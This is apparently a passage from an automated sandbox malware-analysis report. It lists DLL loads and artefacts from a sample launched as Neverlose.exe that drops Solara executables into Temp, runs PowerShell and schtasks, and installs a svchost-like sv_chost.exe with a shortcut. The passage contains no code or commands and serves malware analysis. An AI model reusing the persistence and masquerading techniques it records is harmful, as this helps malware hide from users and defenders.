                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: avicap32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: msvfw32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\Solara.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\sv_chost.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\Neverlose.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
                  Source: sv_chost.lnk.4.dr | LNK file: ..\..\..\..\..\sv_chost.exe
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\Neverlose.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: Neverlose.exe | Static file information: File size 1189376 > 1048576
                  Source: Binary string: C:\Users\Ashtin\Desktop\WTF\SolaraBootstrapper\SolaraBootstrapper\obj\Debug\SolaraBootstrapper.pdbgI source: Neverlose.exe, 00000000.00000002.1730503666.0000000003937000.00000004.00000800.00020000.00000000.sdmp, Neverlose.exe, 00000000.00000002.1730503666.0000000003921000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000005.00000000.1722482732.00000000008C2000.00000002.00000001.01000000.00000008.sdmp, SolaraBootstrapper.exe.0.dr
